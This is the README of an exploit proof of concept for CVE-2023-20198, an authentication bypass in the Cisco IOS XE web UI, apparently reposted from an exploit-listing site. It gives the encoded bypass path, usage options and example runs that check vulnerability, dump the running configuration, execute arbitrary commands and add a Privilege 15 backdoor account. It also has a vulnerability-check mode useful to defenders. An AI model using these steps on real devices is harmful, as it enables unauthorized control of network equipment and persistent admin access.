## https://sploitus.com/exploit?id=943D5962-14B3-5410-8106-BD5EEA778153
# CVE-2023-20198
Exploit PoC for CVE-2023-20198
## Description
CVE-2023-20198 is characterized by improper path validation to bypass Nginx filtering to reach the `webui_wsma_http` web endpoint without requiring authentication.<br>
By bypassing authentication to the endpoint, an attacker can execute arbitrary Cisco IOS commands or issue configuration changes with Privilege 15 privileges.<br>
Cisco's investigation into active exploitation of the previously undisclosed vulnerability revealed threat actors first exploited CVE-2023-20198 to add a new user with Privilege level 15. Further attacks involved exploitation of CVE-2023-20273 to escalate to the underlying Linux OS `root` user to facilitate implantation.<br>
This PoC exploits CVE-2023-20198 to leverage two different XML SOAP endpoints:<br>
The vulnerability check, config, and command execution options all target the `cisco:wsma-exec` SOAP endpoint to insert commands into the `execCLI` element tag.<br>
The add user option targets the `cisco:wsma-config` SOAP endpoint to issue a configuration change and add the Privilege 15 account. This endpoint could be [ab]used to make other configuration changes, but thats outside the scope of this PoC.<br>
Abuse of the `cisco:wsma-exec` SOAP endpoint came from the nuclei template<br>
Abuse of the `cisco:wsma-config` SOAP endpoint came from the horizon3ai PoC<br>
Note: I did not conduct any of the original research or PoC development for this CVE. See the references section for credit.
## Usage
```
usage: exploit.py [-h] (-t targetIP | -l targetFile) [-https] (-c | -g | -e command | -a | -d) [-u newUserName] [-p newUserPass] [-o outputFile] [-v]
CVE-2023-20198 Exploit PoC
options:
-h, --help show this help message and exit
-t targetIP Target IP Address
-l targetFile File containing IP Addresses (-c only)
-https Use https
-c [X] Check for vulnerability
-g [X] Get Cisco IOS running config
-e command [X] Execute Cisco IOS command
-a [X] Add new priv 15 user
-d [X] Remove priv 15 user
-u newUserName [Optional] user name for -a or -d. Default: shellsmoke
-p newUserPass [Optional] new user pass for -a. Default: pwned
-o outputFile Write output to file
-v Increase verbosity
```
### Vulnerability check
To check for CVE-2023-20198, `-c` will attempt to exploit the vulnerability to execute `uname -a`<br>
Example:
```
# ./exploit.py -t 10.0.0.1 -c
Testing for vulnerability
Target IP: 10.0.0.1
Target URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http
Vulnerable: True
IOS Ver: <REDACTED> IOS 16.6 Cisco IOS Software [Everest], Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version 16.6.5, RELEASE SOFTWARE (fc3)
```
### Get Cisco Config
The `-g` option executes `sh run` to pull the running config<br>
Example:
```
# ./exploit.py -t 10.0.0.1 -g
Building configuration...
Current configuration : 6988 bytes
!
...
!
version 16.6
no service pad
service timestamps debug datetime msec
service timestamps log datetime msec
...
```
### Execute commands
Arbitrary Cisco IOS commands can be executed with the `-e` option.<br>
Extreme caution should be used when using this to make configuration changes. There is no input validation and changes are applied immediately to the running config.<br>
Example:
```
# ./exploit.py -t 10.0.0.1 -e 'sh log'
Selected Target: 10.0.0.1
Running in Exec Mode
Executing Command: sh log
Sending exploit to target URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http
Syslog logging: enabled (0 messages dropped, 1 messages rate-limited, 0 flushes, 0 overruns, xml disabled, filtering disabled)
No Active Message Discriminator.
No Inactive Message Discriminator.
Console logging: level debugging, 5368 messages logged, xml disabled,
filtering disabled
...
```
### Add user
The `-a` option can be used to create a new Privilege 15 user account, optionally specifying the account name and password with `-u` and `-p` respectively.<br>
Example:
```
# ./exploit.py -t 10.0.0.1 -a -u shellsmoke -p pwned
Selected Target: 10.0.0.1
Adding New Privilege 15 User
New User Name: shellsmoke
New User Pass: pwned
Sending exploit to target URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http
No reportable output from adding users
Check verbose ouput or get running config
Done.
```
### Del user
The `-d` option can be used to remove a user account from the device, and respects the username specified with `-u`.<br>
Caution should be used to make sure you aren't deleting a legitimate account.<br>
This was added for instances where shell/webui access to an exploited Cisco can not be obtained. It was observed that adding a Privilege 15 user does not grant webui access and could lead to leaving exploitation artifacts on hosts.<br>
## References
[Cisco Advisory](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z)<br>
[horizon3ai CVE-2023-20198 research](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/)<br>
[horizon3ai CVE-2023-20198 PoC](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/)<br>
[nuclei CVE-2023-20198 template](https://cloud.projectdiscovery.io/public/CVE-2023-20198) (Authors: iamnoooob, rootxharsh, pdresearch)<br>
[LeakIX CVE-2023-20273 PoC](https://blog.leakix.net/2023/10/cisco-root-privesc/)<br>
## TODO
- [ ] https support
- [ ] CVE-2023-20273 Implementation
- [ ] Timeout and error handling
## Disclaimer
The code contained in this project is intended only for research and usage on systems where the user has explicit authorization.<br>
The author of this project is not responsible or liable for misuse of the software.<br>
Use responsibly and don't be evil